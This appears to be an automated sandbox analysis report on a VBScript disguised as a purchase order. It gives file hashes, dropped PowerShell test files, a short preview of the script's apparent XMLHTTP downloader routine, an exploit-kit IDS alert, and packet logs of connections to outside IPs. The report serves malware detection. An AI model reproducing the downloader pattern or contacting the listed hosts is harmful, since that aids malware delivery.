SHA-512:	6198106131F8C8083DA7946BADE71A6BB3A37474DC81E699976680CD3ACC1E84B8A151F7F8D15A79C1343BB108992D44CB98FE78593F55CE891B669EB6022106
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dl4nswl.53v.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahaqvm4s.lqx.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqudndbs.ssr.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfponxrb.j0s.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.3776976523521616
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	orden de compra.vbs
File size:	4'922 bytes
MD5:	a9adf46657f51b2156df15d0205b2b68
SHA1:	267f6ce51db2758acbbfa7e5889924675d6e82c9
SHA256:	dbf832467044f498c73a6c65ed31c2aee84c8e6e90c2017524fe3a7e7b6f7205
SHA512:	5250487d7355a291fa615a52be4e7cef94cfb4b045c49a2e37ea854477e3a78fa0e6dc3478304d726dbe0e41ffbab18b921d47e4ae9202cb28105555c44553e9
SSDEEP:	96:hQeuIznFaoXeHjbAKxfMpHSpQnn8ftGZ2k7:L5cs8i2k7
TLSH:	5EA14B1693FA4504F2F35A4CA93222694F737E6A697C821C05EC781D1FF3A8498267B7
File Content Preview:	.. . . . .S.u.b. .t.r.a.q.u.i.n.o.(.a.l.a.n.c.e.a.d.o.r.,. .m.e.t.o.d.o.,. .u.r.l.,. .r.e.c.e.n.d.e.r.)..... . . . .I.f. .N.o.t. .I.s.O.b.j.e.c.t.(.a.l.a.n.c.e.a.d.o.r.). .T.h.e.n..... . . . .W.S.c.r.i.p.t...E.c.h.o. .".E.r.r.o.:. .O.b.j.e.t.o. .X.M.L.H.T

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-06:54:17.860164	TCP	2020425	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M1	80	49733	192.3.243.154	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 06:54:07.989644051 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:07.989733934 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:07.989854097 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:07.998487949 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:07.998507023 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:08.332496881 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:08.332580090 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:08.385148048 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:08.385181904 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:08.385565996 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:08.385755062 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:08.387967110 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:08.432113886 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.028999090 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029041052 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029129982 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029164076 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029181004 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029206991 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029213905 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029249907 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029257059 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029292107 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029306889 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029344082 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029351950 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029397011 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029491901 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029530048 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029894114 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.029973984 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.029980898 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.030019999 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.030097008 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.030138969 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.030191898 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.030235052 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.030241013 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.030263901 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:09.030297041 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.030308008 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.031964064 CEST	49730	443	192.168.2.4	104.21.84.67
Apr 24, 2024 06:54:09.031976938 CEST	443	49730	104.21.84.67	192.168.2.4
Apr 24, 2024 06:54:11.948594093 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:11.948631048 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:11.948821068 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:11.956926107 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:11.956939936 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.290555000 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.290654898 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.294048071 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.294060946 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.294302940 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.300426960 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.348110914 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.659763098 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.659810066 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.659831047 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.659862995 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.659872055 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.659885883 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.659977913 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.660151005 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.660201073 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.660207987 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.660872936 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.660980940 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.661051989 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.661099911 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.661107063 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.661233902 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.661698103 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.661760092 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.661767006 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.661772966 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.661892891 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.661897898 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.662722111 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.662786007 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.662794113 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.662873030 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.663197994 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.663203955 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.663551092 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.663606882 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.663613081 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.663721085 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.663819075 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.663825035 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.664514065 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.664567947 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.664575100 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.664702892 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.664940119 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.664944887 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.665568113 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.665627003 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.665633917 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.666249990 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.666301966 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.666309118 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.666430950 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.666521072 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.666624069 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.666631937 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.666996956 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.667104959 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.667325020 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.667347908 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.667376041 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.667382956 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.667470932 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.668065071 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.668400049 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.668603897 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.668633938 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.668642044 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.668975115 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.669231892 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.669337988 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.821070910 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.821224928 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.821240902 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.821367025 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.821576118 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.821636915 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.821826935 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.821881056 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.822073936 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.822189093 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.822978020 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.823035955 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.824266911 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.824315071 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.824574947 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.824629068 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.825412989 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.825476885 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.825630903 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.825939894 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.826498032 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.826550961 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.827521086 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.827574015 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.828210115 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.828267097 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.829001904 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.829058886 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.829320908 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.829375029 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.829381943 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.829412937 CEST	443	49731	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.829458952 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.829458952 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.831522942 CEST	49731	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.855338097 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.855379105 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:12.855469942 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.855712891 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:12.855726004 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.182501078 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.184652090 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.184672117 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.893722057 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.893764973 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.893872976 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.893888950 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.893940926 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.893973112 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.894011021 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.894049883 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.894870996 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.894918919 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.894920111 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.894928932 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.894958973 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.895016909 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.895688057 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.895728111 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.895733118 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.895781040 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.895848989 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.896713972 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.896755934 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.896759033 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.896806955 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.896847963 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.896852016 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.897744894 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.897787094 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.897795916 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.897831917 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.897835970 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.897890091 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.898375034 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.898415089 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.898430109 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.898525953 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.898564100 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.898566961 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.899401903 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.899444103 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.899445057 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.899452925 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.899492025 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.900178909 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.900302887 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.900341988 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.900345087 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.901024103 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.901070118 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.901073933 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.901174068 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.901222944 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.901228905 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.901269913 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.901993990 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.902431011 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.902473927 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.902479887 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.902524948 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:13.903371096 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:13.903424025 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.053993940 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.054135084 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.054143906 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.054184914 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.054579020 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.054672956 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.054888964 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.054939985 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.055679083 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.055736065 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.056596041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.056646109 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.057363987 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.057418108 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.058089972 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.058144093 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.058887005 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.058939934 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.059057951 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.059104919 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.060178041 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.060234070 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.060934067 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.060986042 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.062532902 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.062598944 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.063308954 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.063364983 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.063678980 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.063735962 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.064238071 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.064332962 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.064531088 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.064573050 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.216229916 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.216437101 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.217492104 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.217556953 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.217942953 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.217998981 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.218230963 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.218282938 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.220638037 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.220726013 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.220773935 CEST	443	49732	104.21.45.138	192.168.2.4
Apr 24, 2024 06:54:14.220825911 CEST	49732	443	192.168.2.4	104.21.45.138
Apr 24, 2024 06:54:14.221000910 CEST	443	49732	104.21.45.138	192.168.2.4
